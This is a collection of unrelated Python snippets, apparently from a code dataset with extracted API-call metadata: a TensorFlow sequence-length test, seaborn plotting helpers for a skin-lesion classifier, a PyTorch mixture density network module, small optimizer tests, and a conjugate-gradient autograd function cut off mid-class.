[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.9, 0.0, 0.0]]
char_mat_2 = [[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_3 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0]]
char_mat_4 = [[0.0, 0.0, 0.0, 0.1, 0.0, 0.0],
[0.0, 0.0, 0.0, 0.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[0.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
char_mat_5 = [[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 1.0, 0.0, 0.0],
[1.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
#expected output: [5, 2, 4, 5, 4]
char_lst = [char_mat_1, char_mat_2, char_mat_3,
char_mat_4, char_mat_5]
np_char_tensor = np.array(char_lst)
char_prob = tf.constant(np.array(np_char_tensor), tf.float64)
char_prob = tf.transpose(char_prob, [1, 0, 2])
print(tf.Tensor.get_shape(char_prob))
sequence_length_lst = [1, 1, 1, 1, 1]
sequence_length = tf.constant(sequence_length_lst)
done_mask = tf.cast(tf.zeros(batch_size), tf.bool)
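# The loop below flags, for every batch element, the first time step whose
# arg-max symbol is 0 (treated as an end-of-sequence marker), updates a
# per-element sequence length, and signals via keep_working when all elements
# are done or max_it is exceeded.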
for time in range(0, 5):
print(time)
current_date = char_prob[:, time, :]
max_vals = tf.argmax(current_date, 1)
mask = tf.equal(max_vals, tf.constant(0, tf.int64))
current_mask = tf.logical_and(mask, tf.logical_not(done_mask))
done_mask = tf.logical_or(mask, done_mask)
time_vec = tf.ones(batch_size, tf.int32)*(time+2)
sequence_length = tf.select(done_mask, sequence_length, time_vec, name=None)
not_done_no = tf.reduce_sum(tf.cast(tf.logical_not(done_mask), tf.int32))
all_eos = tf.equal(not_done_no, tf.constant(0))
stop_loop = tf.logical_or(all_eos, tf.greater(time, max_it))
keep_working = tf.logical_not(stop_loop)
sess = tf.Session()
with sess.as_default():
tf.initialize_all_variables().run()
#print(char_prob.eval())
print(max_vals.eval())
print(mask.eval())
print(done_mask.eval())
print(sequence_length.eval())
print(keep_working.eval())
|
[
"tensorflow.Tensor.get_shape",
"IPython.core.debugger.Tracer",
"tensorflow.initialize_all_variables",
"tensorflow.transpose",
"tensorflow.logical_or",
"tensorflow.ones",
"tensorflow.logical_not",
"tensorflow.Session",
"numpy.array",
"tensorflow.argmax",
"tensorflow.constant",
"tensorflow.greater",
"tensorflow.select",
"tensorflow.zeros"
] |
[((164, 172), 'IPython.core.debugger.Tracer', 'Tracer', ([], {}), '()\n', (170, 172), False, 'from IPython.core.debugger import Tracer\n'), ((199, 213), 'tensorflow.constant', 'tf.constant', (['(6)'], {}), '(6)\n', (210, 213), True, 'import tensorflow as tf\n'), ((1507, 1525), 'numpy.array', 'np.array', (['char_lst'], {}), '(char_lst)\n', (1515, 1525), True, 'import numpy as np\n'), ((1601, 1635), 'tensorflow.transpose', 'tf.transpose', (['char_prob', '[1, 0, 2]'], {}), '(char_prob, [1, 0, 2])\n', (1613, 1635), True, 'import tensorflow as tf\n'), ((1730, 1762), 'tensorflow.constant', 'tf.constant', (['sequence_length_lst'], {}), '(sequence_length_lst)\n', (1741, 1762), True, 'import tensorflow as tf\n'), ((2495, 2507), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (2505, 2507), True, 'import tensorflow as tf\n'), ((1551, 1575), 'numpy.array', 'np.array', (['np_char_tensor'], {}), '(np_char_tensor)\n', (1559, 1575), True, 'import numpy as np\n'), ((1642, 1672), 'tensorflow.Tensor.get_shape', 'tf.Tensor.get_shape', (['char_prob'], {}), '(char_prob)\n', (1661, 1672), True, 'import tensorflow as tf\n'), ((1783, 1803), 'tensorflow.zeros', 'tf.zeros', (['batch_size'], {}), '(batch_size)\n', (1791, 1803), True, 'import tensorflow as tf\n'), ((1912, 1938), 'tensorflow.argmax', 'tf.argmax', (['current_date', '(1)'], {}), '(current_date, 1)\n', (1921, 1938), True, 'import tensorflow as tf\n'), ((2079, 2109), 'tensorflow.logical_or', 'tf.logical_or', (['mask', 'done_mask'], {}), '(mask, done_mask)\n', (2092, 2109), True, 'import tensorflow as tf\n'), ((2187, 2245), 'tensorflow.select', 'tf.select', (['done_mask', 'sequence_length', 'time_vec'], {'name': 'None'}), '(done_mask, sequence_length, time_vec, name=None)\n', (2196, 2245), True, 'import tensorflow as tf\n'), ((2461, 2486), 'tensorflow.logical_not', 'tf.logical_not', (['stop_loop'], {}), '(stop_loop)\n', (2475, 2486), True, 'import tensorflow as tf\n'), ((1969, 1993), 'tensorflow.constant', 'tf.constant', (['(0)', 'tf.int64'], {}), '(0, tf.int64)\n', (1980, 1993), True, 'import tensorflow as tf\n'), ((2036, 2061), 'tensorflow.logical_not', 'tf.logical_not', (['done_mask'], {}), '(done_mask)\n', (2050, 2061), True, 'import tensorflow as tf\n'), ((2126, 2155), 'tensorflow.ones', 'tf.ones', (['batch_size', 'tf.int32'], {}), '(batch_size, tf.int32)\n', (2133, 2155), True, 'import tensorflow as tf\n'), ((2361, 2375), 'tensorflow.constant', 'tf.constant', (['(0)'], {}), '(0)\n', (2372, 2375), True, 'import tensorflow as tf\n'), ((2416, 2440), 'tensorflow.greater', 'tf.greater', (['time', 'max_it'], {}), '(time, max_it)\n', (2426, 2440), True, 'import tensorflow as tf\n'), ((2287, 2312), 'tensorflow.logical_not', 'tf.logical_not', (['done_mask'], {}), '(done_mask)\n', (2301, 2312), True, 'import tensorflow as tf\n'), ((2536, 2565), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (2563, 2565), True, 'import tensorflow as tf\n')]
|
from typing import List, Tuple
import seaborn as sns
import matplotlib
matplotlib.use('TkAgg')
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
"""
Plots of tensorboard results with adjusted theming for presentation
"""
label_dict = {0: 'akiec', 1: 'bcc', 2: 'bkl', 3: 'df', 4: 'mel', 5: 'nv', 6: 'vasc'}
sns.set_context(rc={'patch.linewidth': 0.0})
bg_color = '#DAEDEF'
first_color = '#ADC9C4'
second_color = '#7D918E'
def set_plot_theme(ax):
ax.set_facecolor(bg_color)
ax.spines['left'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_color(second_color)
ax.xaxis.label.set_color(second_color)
ax.yaxis.label.set_color(second_color)
ax.yaxis.grid(color=second_color, linewidth=.5, zorder=0)
ax.tick_params(axis='x', colors=second_color)
ax.tick_params(axis='y', colors=second_color, width=.5)
def plot_label_counts(label_counts):
series = pd.Series(label_counts, index=[label_dict[i] for i in range(7)])
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
ax.set_title('', color=second_color)
sns.barplot(x=series.index, y=series, ax=ax, ci=None, color=first_color, zorder=3)
set_plot_theme(ax)
fig.show()
def plot_confusion_matrix(confusion_matrix, title):
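    # Normalise each column of the confusion matrix by its column sum so the
    # heatmap shows fractions rather than raw counts.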
pct_matrix = confusion_matrix / np.sum(confusion_matrix, axis=0)
df_cm = pd.DataFrame(pct_matrix,
index=[label_dict[i] for i in range(7)],
columns=[label_dict[i] for i in range(7)])
# draw heatmap
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
cmap = sns.dark_palette("#E3F8FA", as_cmap=True)
sns.heatmap(df_cm, ax=ax, annot=True, fmt=".2f", cmap=cmap)
ax.set_title(title, color=second_color)
ax.spines['left'].set_color(second_color)
ax.spines['left'].set_visible(True)
ax.spines['right'].set_color(second_color)
ax.spines['right'].set_visible(True)
ax.spines['top'].set_color(second_color)
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_color(second_color)
ax.spines['bottom'].set_visible(True)
ax.xaxis.label.set_color(second_color)
ax.yaxis.label.set_color(second_color)
ax.tick_params(axis='x', colors=second_color, width=1.0)
ax.tick_params(axis='y', colors=second_color, width=.5)
fig.show()
def plot_performance_graphs(data: List[Tuple[str, str, str, pd.Series]]):
fig, ax = plt.subplots(nrows=1, ncols=1, facecolor=bg_color)
ax.set_ylim([0.0, 1.0])
set_plot_theme(ax)
for title, color, linestyle, series in data:
ax.plot(series.index, series, label=title, color=color, linestyle=linestyle)
#plt.axvline(x=8, color=second_color)
ax.legend()
fig.show()
|
[
"matplotlib.use",
"seaborn.set_context",
"seaborn.heatmap",
"numpy.sum",
"seaborn.dark_palette",
"seaborn.barplot",
"matplotlib.pyplot.subplots"
] |
[((72, 95), 'matplotlib.use', 'matplotlib.use', (['"""TkAgg"""'], {}), "('TkAgg')\n", (86, 95), False, 'import matplotlib\n'), ((334, 378), 'seaborn.set_context', 'sns.set_context', ([], {'rc': "{'patch.linewidth': 0.0}"}), "(rc={'patch.linewidth': 0.0})\n", (349, 378), True, 'import seaborn as sns\n'), ((1067, 1117), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (1079, 1117), True, 'from matplotlib import pyplot as plt\n'), ((1163, 1249), 'seaborn.barplot', 'sns.barplot', ([], {'x': 'series.index', 'y': 'series', 'ax': 'ax', 'ci': 'None', 'color': 'first_color', 'zorder': '(3)'}), '(x=series.index, y=series, ax=ax, ci=None, color=first_color,\n zorder=3)\n', (1174, 1249), True, 'import seaborn as sns\n'), ((1611, 1661), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (1623, 1661), True, 'from matplotlib import pyplot as plt\n'), ((1673, 1714), 'seaborn.dark_palette', 'sns.dark_palette', (['"""#E3F8FA"""'], {'as_cmap': '(True)'}), "('#E3F8FA', as_cmap=True)\n", (1689, 1714), True, 'import seaborn as sns\n'), ((1719, 1778), 'seaborn.heatmap', 'sns.heatmap', (['df_cm'], {'ax': 'ax', 'annot': '(True)', 'fmt': '""".2f"""', 'cmap': 'cmap'}), "(df_cm, ax=ax, annot=True, fmt='.2f', cmap=cmap)\n", (1730, 1778), True, 'import seaborn as sns\n'), ((2483, 2533), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(1)', 'facecolor': 'bg_color'}), '(nrows=1, ncols=1, facecolor=bg_color)\n', (2495, 2533), True, 'from matplotlib import pyplot as plt\n'), ((1374, 1406), 'numpy.sum', 'np.sum', (['confusion_matrix'], {'axis': '(0)'}), '(confusion_matrix, axis=0)\n', (1380, 1406), True, 'import numpy as np\n')]
|
"""
A module for a mixture density network layer
(_Mixture Density Networks_ by Bishop, 1994.)
"""
import sys
import torch
import torch.tensor as ts
import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import math
# Draw distributions
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.colors import LinearSegmentedColormap
'''
Process:
Input:x -> Some model (body) -> Characteristic vector:z (feature)
-> MDN (head) -> Probabilistic vector:p (output)
'''
class MDN_Module(nn.Module):
"""
A Mixture Density Network Module
Symbols:
B - Batch size
G - Number of Gaussian components
D - Input's dimensions
F - Feature's dimensions
C - Output's dimensions (Gaussian distribution's dimensions)
Arguments:
dim_fea (int): the feature's dimensions
        dim_prob (int): the output's dimensions
num_gaus (int): the number of Gaussians per output dimension
Input:
minibatch (BxF)
Output:
(alp, mu, sigma) (BxG, BxGxC, BxGxC)
alp - (alpha) Component's weight
mu - Mean value
sigma - Standard deviation
"""
def __init__(self, dim_fea, dim_prob, num_gaus):
super(MDN_Module, self).__init__()
self.dim_fea = dim_fea
self.dim_prob = dim_prob
self.num_gaus = num_gaus
self.layer_alp = nn.Sequential(
nn.Linear(dim_fea, num_gaus),
nn.Softmax(dim=1) # If 1, go along each row
)
self.layer_mu = nn.Linear(dim_fea, dim_prob*num_gaus)
self.layer_sigma = nn.Sequential(
nn.Linear(dim_fea, dim_prob*num_gaus),
ReExp_Layer()
)
def forward(self, batch):
alp = self.layer_alp(batch)
mu = self.layer_mu(batch)
mu = mu.view(-1, self.num_gaus, self.dim_prob)
sigma = self.layer_sigma(batch)
sigma = sigma.view(-1, self.num_gaus, self.dim_prob)
return alp, mu, sigma
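# Usage sketch (illustrative, not part of the original module): with a feature batch of shape BxF
#   mdn = MDN_Module(dim_fea=64, dim_prob=2, num_gaus=5)
#   alp, mu, sigma = mdn(torch.randn(8, 64))  # shapes: 8x5, 8x5x2, 8x5x2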
class ReExp_Layer(nn.Module):
"""
A modified exponential layer.
    Only the negative part of the exponential is retained;
    the positive part is linear: y = x + 1.
"""
def __init__(self):
super().__init__()
def forward(self, x):
l = nn.ELU() # ELU: max(0,x)+min(0,α∗(exp(x)−1))
        return torch.add(l(x), 1) # ensure no negative sigma is produced
class classic_MDN_Module(nn.Module):
def __init__(self, dim_fea, dim_prob, num_gaus):
super(classic_MDN_Module, self).__init__()
self.dim_fea = dim_fea
self.dim_prob = dim_prob
self.num_gaus = num_gaus
self.layer_alp = nn.Sequential(
nn.Linear(dim_fea, num_gaus),
nn.Softmax(dim=1) # If 1, go along each row
)
self.layer_mu = nn.Linear(dim_fea, dim_prob*num_gaus)
self.layer_sigma = nn.Sequential(
nn.Linear(dim_fea, dim_prob*num_gaus)
)
def forward(self, batch):
alp = self.layer_alp(batch)
mu = self.layer_mu(batch)
mu = mu.view(-1, self.num_gaus, self.dim_prob)
sigma = torch.exp(self.layer_sigma(batch))
sigma = sigma.view(-1, self.num_gaus, self.dim_prob)
return alp, mu, sigma
def cal_GauProb(mu, sigma, x):
"""
Return the probability of "data" given MoG parameters "mu" and "sigma".
Arguments:
mu (BxGxC) - The means of the Gaussians.
sigma (BxGxC) - The standard deviation of the Gaussians.
x (BxC) - A batch of data points.
Return:
        probabilities (BxG): The probability of each data point under the
            Gaussian distribution at the corresponding mu/sigma index.
"""
x = x.unsqueeze(1).expand_as(mu) # BxC -> Bx1xC -> BxGxC
prob = torch.rsqrt(torch.tensor(2*math.pi)) * torch.exp(-((x - mu) / sigma)**2 / 2) / sigma
return torch.prod(prob, dim=2) # overall probability for all output's dimensions in each component, BxG
def cal_multiGauProb(alp, mu, sigma, x):
"""
Arguments:
alp (BxG) - (alpha) Component's weight
"""
prob = alp * cal_GauProb(mu, sigma, x) # BxG
prob = torch.sum(prob, dim=1) # Bx1
    # overall probability for each batch element (sum over all components)
return prob
def loss_NLL(alp, mu, sigma, data):
"""
Calculates the error, given the MoG parameters and the data.
The loss is the negative log likelihood of the data given the MoG parameters.
"""
nll = -torch.log(cal_multiGauProb(alp, mu, sigma, data))
return torch.mean(nll)
def loss_MaDist(alp, mu, sigma, data): # Mahalanobis distance
'''
mu (GxC) - The means of the Gaussians.
sigma (GxC) - The standard deviation of the Gaussians.
'''
md = []
alp = alp/sum(alp) #normalization
for i in range(mu.shape[0]): # do through every component
mu0 = (data-mu[i,:]).unsqueeze(0) # (x-mu)
S_inv = ts([[1/sigma[i,0],0],[0,1/sigma[i,1]]]) # S^-1 inversed covariance matrix
md0 = torch.sqrt( S_inv[0,0]*mu0[0,0]**2 + S_inv[1,1]*mu0[0,1]**2 )
md.append(md0)
return ts(md), sum(ts(md)*alp)
def loss_EMD(): pass
def sample(alp, mu, sigma):
"""
Draw samples from a MoG.
Return one sample for each batch
"""
categorical = Categorical(alp) # aka. generalized Bernoulli
try:
alps = list(categorical.sample().data) # take a sample of alpha for each batch
except:
raise Exception('Ooooops! Model collapse!')
sample = sigma.new_empty(sigma.size(0), sigma.size(2)).normal_() # sample of (0,1) normal distribution
for i, idx in enumerate(alps):
sample[i] = sample[i].mul(sigma[i,idx]).add(mu[i,idx])
return sample
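# Sampling sketch (illustrative names): draw one point per batch element from the predicted mixture
#   alp, mu, sigma = mdn(features)        # e.g. the MDN_Module above
#   points = sample(alp, mu, sigma)       # BxC tensor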
def take_mainCompo(alp, mu, sigma, main=3):
alp = alp[0,:]
mu = mu[0,:,:]
sigma = sigma[0,:,:]
main_alp = alp[:main] # placeholder
main_mu = mu[:main,:] # placeholder
main_sigma = sigma[:main,:] # placeholder
_, indices = torch.sort(alp) # ascending order
for i in range(1,main+1):
idx = indices[-i].item() # largest to smallest
main_alp[i-1] = alp[idx]
main_mu[i-1,:] = mu[idx,:]
main_sigma[i-1,:] = sigma[idx,:]
return main_alp.unsqueeze(0), main_mu.unsqueeze(0), main_sigma.unsqueeze(0) # insert the "batch" dimension
def take_goodCompo(alp, mu, sigma, thre=0.1):
alp = alp[0,:]
mu = mu[0,:,:]
sigma = sigma[0,:,:]
thre = thre*max(alp)
idx = (alp>thre)
good_alp = alp[idx]
good_mu = mu[idx,:]
good_sigma = sigma[idx,:]
return good_alp.unsqueeze(0), good_mu.unsqueeze(0), good_sigma.unsqueeze(0) # insert the "batch" dimension
def sigma_limit(mu, sigma, nsigma=3):
# nsigma: 1 -> 0.6827 2 -> 0.9545 3 -> 0.9974
x_scope = [(mu-nsigma*sigma)[0,:,0], (mu+nsigma*sigma)[0,:,0]]
y_scope = [(mu-nsigma*sigma)[0,:,1], (mu+nsigma*sigma)[0,:,1]]
x_min = torch.min(x_scope[0])
x_max = torch.max(x_scope[1])
y_min = torch.min(y_scope[0])
y_max = torch.max(y_scope[1])
if x_min != torch.min(abs(x_scope[0])):
x_min = -torch.min(abs(x_scope[0]))
if x_max != torch.max(abs(x_scope[1])):
x_max = -torch.max(abs(x_scope[1]))
if y_min != torch.min(abs(y_scope[0])):
y_min = -torch.min(abs(y_scope[0]))
if y_max != torch.max(abs(y_scope[1])):
y_max = -torch.max(abs(y_scope[1]))
return [x_min, x_max], [y_min, y_max]
def cal_multiGauProbDistr(xx, yy, alp, mu, sigma):
xy = np.concatenate((xx.reshape(-1,1), yy.reshape(-1,1)), axis=1).astype(np.float32)
p = np.array([])
for i in range(xy.shape[0]):
p = np.append( p, cal_multiGauProb(alp, mu, sigma, x=ts(xy[i,:][np.newaxis,:])).detach().numpy() )
p[np.where(p<max(p)/10)] = 0
return p.reshape(xx.shape)
def draw_probDistribution(ax, alp, mu, sigma, main=3, nsigma=3, step=0.5, colorbar=False, toplot=True):
'''
Arguments:
ax - Axis
alp (BxG) - (alpha) Component's weight.
mu (BxGxC) - The means of the Gaussians.
sigma (BxGxC) - The standard deviation of the Gaussians.
'''
if main is not None:
alp, mu, sigma = take_mainCompo(alp, mu, sigma, main=main)
# ================= Register Colormap ================START
ncolors = 256
color_array = plt.get_cmap('gist_rainbow')(range(ncolors)) # get colormap
color_array[:,-1] = np.linspace(0,1,ncolors) # change alpha values
color_array[:,-1][:25] = 0
map_object = LinearSegmentedColormap.from_list(name='rainbow_alpha',colors=color_array) # create a colormap object
plt.register_cmap(cmap=map_object) # register this new colormap with matplotlib
# ================= Register Colormap ==================END
xlim, ylim = sigma_limit(mu, sigma, nsigma=nsigma)
x = np.arange(xlim[0].detach().numpy(), xlim[1].detach().numpy(), step=step)
y = np.arange(ylim[0].detach().numpy(), ylim[1].detach().numpy(), step=step)
xx, yy = np.meshgrid(x, y)
pp = cal_multiGauProbDistr(xx, yy, alp, mu, sigma)
if toplot:
cntr = ax.contourf(xx, yy, pp, cmap="rainbow_alpha")
if colorbar:
plt.colorbar(cntr, ax=ax)
return xx,yy,pp
def draw_GauEllipse(ax, mu, sigma, fc='b', nsigma=3, extend=False, label=None):
'''
mu (GxC) - The means of the Gaussians.
sigma (GxC) - The standard deviation of the Gaussians.
'''
for i in range(mu.shape[0]):
if i != 0:
label=None
if extend:
patch = patches.Ellipse(mu[i,:], nsigma*sigma[i,0]+8, nsigma*sigma[i,1]+8, fc=fc, label=label)
ax.add_patch(patch)
else:
patch = patches.Ellipse(mu[i,:], nsigma*sigma[i,0], nsigma*sigma[i,1], fc=fc, label=label)
ax.add_patch(patch)
|
[
"torch.distributions.Categorical",
"torch.max",
"torch.sqrt",
"torch.exp",
"torch.min",
"numpy.array",
"torch.sum",
"torch.mean",
"torch.prod",
"numpy.linspace",
"numpy.meshgrid",
"torch.sort",
"matplotlib.pyplot.register_cmap",
"matplotlib.patches.Ellipse",
"matplotlib.colors.LinearSegmentedColormap.from_list",
"matplotlib.pyplot.get_cmap",
"torch.nn.Softmax",
"matplotlib.pyplot.colorbar",
"torch.tensor",
"torch.nn.Linear",
"torch.nn.ELU"
] |
[((4004, 4027), 'torch.prod', 'torch.prod', (['prob'], {'dim': '(2)'}), '(prob, dim=2)\n', (4014, 4027), False, 'import torch\n'), ((4285, 4307), 'torch.sum', 'torch.sum', (['prob'], {'dim': '(1)'}), '(prob, dim=1)\n', (4294, 4307), False, 'import torch\n'), ((4691, 4706), 'torch.mean', 'torch.mean', (['nll'], {}), '(nll)\n', (4701, 4706), False, 'import torch\n'), ((5430, 5446), 'torch.distributions.Categorical', 'Categorical', (['alp'], {}), '(alp)\n', (5441, 5446), False, 'from torch.distributions import Categorical\n'), ((6123, 6138), 'torch.sort', 'torch.sort', (['alp'], {}), '(alp)\n', (6133, 6138), False, 'import torch\n'), ((7046, 7067), 'torch.min', 'torch.min', (['x_scope[0]'], {}), '(x_scope[0])\n', (7055, 7067), False, 'import torch\n'), ((7080, 7101), 'torch.max', 'torch.max', (['x_scope[1]'], {}), '(x_scope[1])\n', (7089, 7101), False, 'import torch\n'), ((7114, 7135), 'torch.min', 'torch.min', (['y_scope[0]'], {}), '(y_scope[0])\n', (7123, 7135), False, 'import torch\n'), ((7148, 7169), 'torch.max', 'torch.max', (['y_scope[1]'], {}), '(y_scope[1])\n', (7157, 7169), False, 'import torch\n'), ((7717, 7729), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (7725, 7729), True, 'import numpy as np\n'), ((8546, 8572), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'ncolors'], {}), '(0, 1, ncolors)\n', (8557, 8572), True, 'import numpy as np\n'), ((8641, 8716), 'matplotlib.colors.LinearSegmentedColormap.from_list', 'LinearSegmentedColormap.from_list', ([], {'name': '"""rainbow_alpha"""', 'colors': 'color_array'}), "(name='rainbow_alpha', colors=color_array)\n", (8674, 8716), False, 'from matplotlib.colors import LinearSegmentedColormap\n'), ((8747, 8781), 'matplotlib.pyplot.register_cmap', 'plt.register_cmap', ([], {'cmap': 'map_object'}), '(cmap=map_object)\n', (8764, 8781), True, 'import matplotlib.pyplot as plt\n'), ((9122, 9139), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (9133, 9139), True, 'import numpy as np\n'), ((1673, 1712), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (1682, 1712), True, 'import torch.nn as nn\n'), ((2395, 2403), 'torch.nn.ELU', 'nn.ELU', ([], {}), '()\n', (2401, 2403), True, 'import torch.nn as nn\n'), ((2927, 2966), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (2936, 2966), True, 'import torch.nn as nn\n'), ((5071, 5119), 'torch.tensor', 'ts', (['[[1 / sigma[i, 0], 0], [0, 1 / sigma[i, 1]]]'], {}), '([[1 / sigma[i, 0], 0], [0, 1 / sigma[i, 1]]])\n', (5073, 5119), True, 'import torch.tensor as ts\n'), ((5159, 5230), 'torch.sqrt', 'torch.sqrt', (['(S_inv[0, 0] * mu0[0, 0] ** 2 + S_inv[1, 1] * mu0[0, 1] ** 2)'], {}), '(S_inv[0, 0] * mu0[0, 0] ** 2 + S_inv[1, 1] * mu0[0, 1] ** 2)\n', (5169, 5230), False, 'import torch\n'), ((5255, 5261), 'torch.tensor', 'ts', (['md'], {}), '(md)\n', (5257, 5261), True, 'import torch.tensor as ts\n'), ((8462, 8490), 'matplotlib.pyplot.get_cmap', 'plt.get_cmap', (['"""gist_rainbow"""'], {}), "('gist_rainbow')\n", (8474, 8490), True, 'import matplotlib.pyplot as plt\n'), ((1550, 1578), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', 'num_gaus'], {}), '(dim_fea, num_gaus)\n', (1559, 1578), True, 'import torch.nn as nn\n'), ((1592, 1609), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (1602, 1609), True, 'import torch.nn as nn\n'), ((1765, 1804), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * 
num_gaus)\n', (1774, 1804), True, 'import torch.nn as nn\n'), ((2804, 2832), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', 'num_gaus'], {}), '(dim_fea, num_gaus)\n', (2813, 2832), True, 'import torch.nn as nn\n'), ((2846, 2863), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (2856, 2863), True, 'import torch.nn as nn\n'), ((3019, 3058), 'torch.nn.Linear', 'nn.Linear', (['dim_fea', '(dim_prob * num_gaus)'], {}), '(dim_fea, dim_prob * num_gaus)\n', (3028, 3058), True, 'import torch.nn as nn\n'), ((3947, 3986), 'torch.exp', 'torch.exp', (['(-((x - mu) / sigma) ** 2 / 2)'], {}), '(-((x - mu) / sigma) ** 2 / 2)\n', (3956, 3986), False, 'import torch\n'), ((9306, 9331), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['cntr'], {'ax': 'ax'}), '(cntr, ax=ax)\n', (9318, 9331), True, 'import matplotlib.pyplot as plt\n'), ((9670, 9772), 'matplotlib.patches.Ellipse', 'patches.Ellipse', (['mu[i, :]', '(nsigma * sigma[i, 0] + 8)', '(nsigma * sigma[i, 1] + 8)'], {'fc': 'fc', 'label': 'label'}), '(mu[i, :], nsigma * sigma[i, 0] + 8, nsigma * sigma[i, 1] + \n 8, fc=fc, label=label)\n', (9685, 9772), True, 'import matplotlib.patches as patches\n'), ((9823, 9916), 'matplotlib.patches.Ellipse', 'patches.Ellipse', (['mu[i, :]', '(nsigma * sigma[i, 0])', '(nsigma * sigma[i, 1])'], {'fc': 'fc', 'label': 'label'}), '(mu[i, :], nsigma * sigma[i, 0], nsigma * sigma[i, 1], fc=fc,\n label=label)\n', (9838, 9916), True, 'import matplotlib.patches as patches\n'), ((3920, 3945), 'torch.tensor', 'torch.tensor', (['(2 * math.pi)'], {}), '(2 * math.pi)\n', (3932, 3945), False, 'import torch\n'), ((5267, 5273), 'torch.tensor', 'ts', (['md'], {}), '(md)\n', (5269, 5273), True, 'import torch.tensor as ts\n'), ((7824, 7851), 'torch.tensor', 'ts', (['xy[i, :][np.newaxis, :]'], {}), '(xy[i, :][np.newaxis, :])\n', (7826, 7851), True, 'import torch.tensor as ts\n')]
|
import numpy as np
import pytest
from opytimizer.math import hypercomplex
def test_norm():
array = np.array([[1, 1]])
norm_array = hypercomplex.norm(array)
assert norm_array > 0
def test_span():
array = np.array([[0.5, 0.75, 0.5, 0.9]])
lb = [0]
ub = [10]
span_array = hypercomplex.span(array, lb, ub)
assert span_array > 0
|
[
"numpy.array",
"opytimizer.math.hypercomplex.span",
"opytimizer.math.hypercomplex.norm"
] |
[((106, 124), 'numpy.array', 'np.array', (['[[1, 1]]'], {}), '([[1, 1]])\n', (114, 124), True, 'import numpy as np\n'), ((143, 167), 'opytimizer.math.hypercomplex.norm', 'hypercomplex.norm', (['array'], {}), '(array)\n', (160, 167), False, 'from opytimizer.math import hypercomplex\n'), ((226, 259), 'numpy.array', 'np.array', (['[[0.5, 0.75, 0.5, 0.9]]'], {}), '([[0.5, 0.75, 0.5, 0.9]])\n', (234, 259), True, 'import numpy as np\n'), ((307, 339), 'opytimizer.math.hypercomplex.span', 'hypercomplex.span', (['array', 'lb', 'ub'], {}), '(array, lb, ub)\n', (324, 339), False, 'from opytimizer.math import hypercomplex\n')]
|
import torch
from scipy.sparse.linalg import LinearOperator, cg
from typing import Callable, Optional
from torch import Tensor
import numpy as np
import time
class CG(torch.autograd.Function):
@staticmethod
def forward(ctx, z: Tensor, AcquisitionModel, beta: Tensor, y, G: Callable, GH: Callable, GHG: Optional[Callable]=None,x0:Optional[Tensor]=None) -> Tensor:
tmp = AcquisitionModel.adjoint(y)
if GHG is None:
GHG = lambda x: GH(G(x))
b = tmp.as_array().ravel() + (beta * GH(z)).numpy().ravel()
if x0 is not None:
x0 = x0.numpy().ravel()
def AHA(x):
tmp.fill(x)
return AcquisitionModel.adjoint(AcquisitionModel.direct(tmp)).as_array().ravel()
H = LinearOperator(
shape=(np.prod(b.shape), np.prod(b.shape)),
dtype=np.complex64,
matvec=lambda x: AHA(x)+(beta * GHG(torch.from_numpy(x).reshape(tmp.shape).unsqueeze(0))).numpy().ravel()
)
sol = cg(H, b,tol=1e-3,x0=x0)
xprime = sol[0].reshape(tmp.shape)
ctx.H = H
ctx.G = G
ctx.GH = GH
xprime_tensor = torch.from_numpy(xprime)
ctx.save_for_backward(beta, xprime_tensor, z)
return xprime_tensor
